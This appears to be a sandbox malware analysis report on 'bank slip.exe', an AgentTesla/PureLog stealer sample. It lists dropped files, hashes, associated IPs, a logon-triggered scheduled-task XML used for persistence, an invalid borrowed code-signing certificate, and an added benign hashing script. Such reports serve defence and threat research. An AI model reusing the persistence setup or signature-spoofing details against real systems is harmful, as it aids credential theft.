PUBLIC-DOMAIN-REGISTRY, US | yZcecBUXN7.exe | malicious | FormBook | 119.18.54.116
PUBLIC-DOMAIN-REGISTRY, US | SecuriteInfo.com.Win32.PWSX-gen.8584.56.exe | malicious | AgentTesla, PureLog Stealer | 199.79.62.115
PUBLIC-DOMAIN-REGISTRY, US | SWIFT COPY.exe | malicious | AgentTesla, PureLog Stealer | 207.174.215.249
PUBLIC-DOMAIN-REGISTRY, US | SWIFT COPY.exe | malicious | AgentTesla, PureLog Stealer | 207.174.215.249
PUBLIC-DOMAIN-REGISTRY, US | H223070141&H223070191.exe | malicious | AgentTesla, PureLog Stealer | 162.251.85.202
                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | PAYMENT LIST.exe | malicious | AgentTesla, PureLog Stealer
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | E7236252-receipt.vbs | malicious | XWorm
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | I7336446-receipt.vbs | malicious | XWorm
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | S94847456-receipt.vbs | malicious | XWorm
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Transfer copy PDF.exe | malicious | AgentTesla, PureLog Stealer
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | PO# CV-PO23002552.PDF.exe | malicious | AgentTesla, PureLog Stealer
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Deposit payment copy PDF.exe | malicious | AgentTesla, PureLog Stealer
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Approved E-DO PDF.exe | malicious | AgentTesla, PureLog Stealer
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | PO# CV-PO23002552.exe | malicious | AgentTesla, PureLog Stealer
C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Invoice Checklist.exe | malicious | AgentTesla, PureLog Stealer
                                                                    Process:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):142
                                                                    Entropy (8bit):5.090621108356562
                                                                    Encrypted:false
                                                                    SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                                    MD5:8C0458BB9EA02D50565175E38D577E35
                                                                    SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                    SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                    SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                    Process:C:\Users\user\Desktop\bank slip.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1216
                                                                    Entropy (8bit):5.34331486778365
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                    Process:C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1216
                                                                    Entropy (8bit):5.34331486778365
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
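The two records above carry the same SHA-256 (B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560) from two different parent processes, bank slip.exe and its scheduled-task copy mKSjGvfmIulVB.exe, which is consistent with the copy being the same program going through the same .NET start-up. The following is an added example, not code from the report or from Joe Sandbox, that computes the per-file fields shown in these records (size, 8-bit Shannon entropy, MD5, SHA-1, SHA-256) and groups records by hash so files written by more than one process stand out. The file contents are constructed stand-ins; only the process paths come from the report, and the entropy cut-off used for the Encrypted flag is an assumption rather than the sandbox's own value.

```python
"""Per-file triage fields in the style of the report's dropped-file
table, plus grouping by SHA-256 across parent processes.

Added example, not from the Joe Sandbox report. File contents below are
constructed; only the process paths are taken from the report. The
entropy cut-off for the Encrypted flag is an assumption.
"""
import hashlib
import math
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# Assumed cut-off: 8.0 bits/byte is the maximum for byte data, and
# compressed or encrypted blobs sit close to it.
ENCRYPTED_ENTROPY_CUTOFF = 7.5


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for one repeated value, 8.0 for a
    uniform spread over all 256 byte values, and text sits around 4-5."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def triage(process: str, data: bytes) -> Dict[str, object]:
    """One row with the fields the report shows per dropped file."""
    entropy = shannon_entropy(data)
    return {
        "process": process,
        "size": len(data),
        "entropy": entropy,
        "encrypted": entropy >= ENCRYPTED_ENTROPY_CUTOFF,
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
    }


def writers_by_sha256(rows: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Map SHA-256 -> sorted list of distinct parent processes."""
    groups: Dict[str, set] = defaultdict(set)
    for row in rows:
        groups[str(row["sha256"])].add(str(row["process"]))
    return {h: sorted(procs) for h, procs in groups.items()}


def shared_drops(rows: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Hashes written by more than one process: the original and a copy
    that behaves identically show up here."""
    return {h: p for h, p in writers_by_sha256(rows).items() if len(p) > 1}


# Constructed sample contents (not the real dropped files).
CLR_LOG = b'1,"fusion","GAC",0\r\n1,"WinRT","NotApp",1\r\n'
PS_POLICY_TEST = b"# PowerShell test file to determine AppLocker lockdown mode"

SAMPLE_DROPS: List[Tuple[str, bytes]] = [
    ("C:\\Users\\user\\Desktop\\bank slip.exe", CLR_LOG),
    ("C:\\Users\\user\\AppData\\Roaming\\mKSjGvfmIulVB.exe", CLR_LOG),
    ("C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", PS_POLICY_TEST),
]


def run_sample():
    rows = [triage(proc, data) for proc, data in SAMPLE_DROPS]
    return rows, shared_drops(rows)


if __name__ == "__main__":
    rows, shared = run_sample()
    for row in rows:
        print(f"{row['size']:5d} bytes  entropy {row['entropy']:.3f}  {row['sha256'][:16]}...  {row['process']}")
    for digest, procs in shared.items():
        print("written by several processes:", digest[:16], procs)
```

When you run this over a real dropped-file directory, replace SAMPLE_DROPS with the file bytes and the parent process from the sandbox's process tree; the grouping step is what turns nineteen individual records into the handful of distinct artifacts worth looking at.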
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):2232
                                                                    Entropy (8bit):5.380747059108785
                                                                    Encrypted:false
                                                                    SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugePu/ZPUyus:lGLHxvIIwLgZ2KRHWLOugYs
                                                                    MD5:3AD8789204FA415704CCF5B3B656BBDD
                                                                    SHA1:7FE555A0FC141DAC4D994A35E788D0893ECA7890
                                                                    SHA-256:469F824997F70EF9F88D0D52BCFFC2EFCB07C561DB69FF4C65C0A7CBC7A432D1
                                                                    SHA-512:172AE94A3822D34858B725EAB261082CBF977969A46D92A7275066D0DE8C8966BA39BA3171B2048D8A2E765CE8F7EE9594F96D6E0A97897583F3559F642257CA
                                                                    Malicious:false
                                                                    Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
(The report lists seven further dropped files from C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe whose every field matches the entry above: 60-byte ASCII text, MD5 D17FE0A3F47BE24A6453E9EF58C94641, SHA-256 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7, Malicious: false, same preview.)
                                                                    Process:C:\Users\user\Desktop\bank slip.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1586
                                                                    Entropy (8bit):5.114825481024603
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt/xvn:cgergYrFdOFzOzN33ODOiDdKrsuT5v
                                                                    MD5:98B0CB9F06E82A2DC5BA7B2CDF48593C
                                                                    SHA1:A9338ED94B1E59B0650809DC843A7AE6FA058C34
                                                                    SHA-256:39EC0F49FAC54622F2BBAFA62B7C9C0E7B6D9E9B474A51A5DE186D53B69766FF
                                                                    SHA-512:2B515628A5CA741AEE2C969C7D3A454A274E45A692E384CD9073CC47761BB8F73CB3DB247AA90B94692FDA0F152905F769A41690CDA382E315E61ADB8AFACE4E
                                                                    Malicious:true
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                    Process:C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1586
                                                                    Entropy (8bit):5.114825481024603
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt/xvn:cgergYrFdOFzOzN33ODOiDdKrsuT5v
                                                                    MD5:98B0CB9F06E82A2DC5BA7B2CDF48593C
                                                                    SHA1:A9338ED94B1E59B0650809DC843A7AE6FA058C34
                                                                    SHA-256:39EC0F49FAC54622F2BBAFA62B7C9C0E7B6D9E9B474A51A5DE186D53B69766FF
                                                                    SHA-512:2B515628A5CA741AEE2C969C7D3A454A274E45A692E384CD9073CC47761BB8F73CB3DB247AA90B94692FDA0F152905F769A41690CDA382E315E61ADB8AFACE4E
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:modified
                                                                    Size (bytes):45984
                                                                    Entropy (8bit):6.16795797263964
                                                                    Encrypted:false
                                                                    SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                                    MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                                    SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                                    SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                                    SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                                    Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
• Antivirus: Virustotal, Detection: 0%
Joe Sandbox View:
• Filename: PAYMENT LIST.exe, Detection: malicious
• Filename: E7236252-receipt.vbs, Detection: malicious
• Filename: I7336446-receipt.vbs, Detection: malicious
• Filename: S94847456-receipt.vbs, Detection: malicious
• Filename: Transfer copy PDF.exe, Detection: malicious
• Filename: PO# CV-PO23002552.PDF.exe, Detection: malicious
• Filename: Deposit payment copy PDF.exe, Detection: malicious
• Filename: Approved E-DO PDF.exe, Detection: malicious
• Filename: PO# CV-PO23002552.exe, Detection: malicious
• Filename: Invoice Checklist.exe, Detection: malicious
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                                    Process:C:\Users\user\Desktop\bank slip.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):745480
                                                                    Entropy (8bit):7.957107975771517
                                                                    Encrypted:false
                                                                    SSDEEP:12288:ioI4iAEfDVx9LPomIdTycMhJJM8MQwWQNCPLtDNNmr7cDn6SLlcP9C3cc081kR:y4RE7VxlPom8TyJPJM8dw4xDjl6ucP9Z
                                                                    MD5:64FF7F01E8A040DD0708D0D3C72A09F7
                                                                    SHA1:71D66159D1414876A6AE19696A5A3D99FC5DF6A6
                                                                    SHA-256:0EB53728ACB5E4B7C857ED35DACC4BA1264249CADA90F5E69D3FDE4E9B243190
                                                                    SHA-512:AD136FF713D93ABAAB512BAB4695F2181568FA9A994F398A946985ECBADFA3A46B07790B648AB47B68BACA27EDE294E4049C8E523D8507D7E334BC3261C21D1C
                                                                    Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 24%
• Antivirus: Virustotal, Detection: 38%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:[8f..............0......@........... ... ....@.. ....................................@.....................................O.... ..X=...........*...6...`..........T............................................ ............... ..H............text...H.... ...................... ..`.rsrc...X=... ...>..................@..@.reloc.......`.......(..............@..B........................H........m...T..........t...X!.........................................."..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*..(......(......(......(......(....*..(......(......(......(......(....*>..o.....X(....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*..{....*"..}....*..0..X........(....}.....(......(......(......(......o......o......o.....r...p(......o.........}....*.0..9.........{.....(.....(.....
                                                                    Process:C:\Users\user\Desktop\bank slip.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1141
                                                                    Entropy (8bit):4.442398121585593
                                                                    Encrypted:false
                                                                    SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                                                    MD5:6FB4D27A716A8851BC0505666E7C7A10
                                                                    SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                                                    SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                                                    SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                                                    Malicious:false
                                                                    Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c
                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.957107975771517
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:bank slip.exe
                                                                    File size:745'480 bytes
                                                                    MD5:64ff7f01e8a040dd0708d0d3c72a09f7
                                                                    SHA1:71d66159d1414876a6ae19696a5a3d99fc5df6a6
                                                                    SHA256:0eb53728acb5e4b7c857ed35dacc4ba1264249cada90f5e69d3fde4e9b243190
                                                                    SHA512:ad136ff713d93abaab512bab4695f2181568fa9a994f398a946985ecbadfa3a46b07790b648ab47b68baca27ede294e4049c8e523d8507d7e334bc3261c21d1c
                                                                    SSDEEP:12288:ioI4iAEfDVx9LPomIdTycMhJJM8MQwWQNCPLtDNNmr7cDn6SLlcP9C3cc081kR:y4RE7VxlPom8TyJPJM8dw4xDjl6ucP9Z
                                                                    TLSH:B6F42383368EC703C67D84B85151924007B166C67F51D298BCEAB0FBAA9FFD28345AD7
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:[8f..............0......@........... ... ....@.. ....................................@................................
                                                                    Icon Hash:f8bcd76926924906
                                                                    Entrypoint:0x4b061a
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x66385B3A [Mon May 6 04:23:22 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                    Signature Valid:false
                                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                    Error Number:-2146869232
Not Before, Not After:
• 13/11/2018 01:00:00, 09/11/2021 00:59:59
Subject Chain:
• CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                    Version:3
                                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                    Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    inc ebx
                                                                    push edi
                                                                    xor al, 50h
                                                                    inc ebx
                                                                    pop edx
                                                                    dec ebx
                                                                    dec eax
                                                                    inc edx
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [edi+38h], al
                                                                    dec eax
                                                                    pop edx
                                                                    inc edi
                                                                    xor al, 42h
                                                                    dec edx
                                                                    cmp byte ptr [ebx+00h], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [ebx+48h], al
                                                                    aaa
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb05c8 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb2000 | 0x3d58 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0xb2a00 | 0x3608 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb6000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xae3cc | 0x54 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xae648 | 0xae800 | 071f91665e1206f31fbc43ca75165ac3 | False | 0.9572634983882522 | data | 7.962545979931204 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xb2000 | 0x3d58 | 0x3e00 | eef5ea739c98051791bab805da2745d9 | False | 0.9456275201612904 | data | 7.812640516769869 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xb6000 | 0xc | 0x200 | bd8718fa8ed6bf3c8cb049985e8de5e5 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xb2100 | 0x373a | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 1.0007780449851464 |
